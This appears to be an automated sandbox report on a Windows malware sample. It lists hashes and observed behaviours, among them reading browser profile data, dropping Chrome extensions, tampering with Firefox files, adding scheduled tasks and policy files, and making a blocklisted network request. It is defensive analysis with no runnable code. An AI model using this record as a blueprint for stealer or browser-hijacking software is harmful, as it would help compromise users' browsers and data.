SHA512 05d9e81255dfbd647198b4f9d13c420f3f8d56a235ebbec301d7006597bec72b4bfa0dc7e8e1f76de4e9d16b5e95a9f5c585bbdb4ce5fe98cade2872dffccf3a

memory/1908-485-0x0000000003560000-0x00000000035EA000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 5c3d2b494609259c278cb3b4716655ad
SHA1 04e9cdbfb2ca5de6594bef0aeebad9366738355b
SHA256 51e1a6c053472e9d7025f8f65a244c9b9cee3d0943084735075c2f7a654d7bf3
SHA512 6c7421f137a31f9f14f83735918e4c1d9f12c78037bb105ae662d39b1cf53d989355abc1c1f841e7dd7aa6453d87f939d214d0287f62e4ca945ab1c2e74970f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\obahtjhr.default-release\prefs.js

MD5 f4c9b1444bebb6416bb18597f08284a0
SHA1 0b4a56ecc91b07df13c1c920326f8af63adc42d8
SHA256 813ae7c2ff7f425ab6ba27f93e67a55576dce02042c3e6806d86eef6c6a4a441
SHA512 48bf4e8e11841d863a5d9f3d89fe97157ae1c53ed03920d9caaffd378f5151db6542f7d2d0165b04260687d98792ae3c401344cae6378042c4f84a65b4937c04

memory/4696-494-0x0000000002120000-0x0000000002708000-memory.dmp

memory/1908-503-0x00000000035F0000-0x00000000036C5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 0e693a74bb5228b38aa5d71a5a407b05
SHA1 fcd8688e2f7f730ccc0bc95a094aaea0874e80be
SHA256 1d3a5859954b6a5d59fe31cf88ab638ce3fd3c2ba2acc68db94eec6275366e22
SHA512 0c3a3505d67985aeb557f349d05fa59215f582bcda8b1e38e703fbd305197788b82e2a186815a26cb8ff3274402fbdaf2074e7c19218a7570a3ef2f32f36f6a9

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-03 11:01

Reported

2024-04-03 11:03

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd397b8859f41846902412c7a48da2adf6f5c0dba1497457009e0495aa01fda6.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\HPSMzKd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\JPjolJJ.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\bUSpFiY.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\kvQFryV.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\zijYPSy.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\SxRKAnO.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\ITelGkRYInBZj.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\zObJAyv.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\jMRIiZu.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\TlkYnZ.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2dcc6a48-0000-0000-0000-d01200000000} C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe N/A
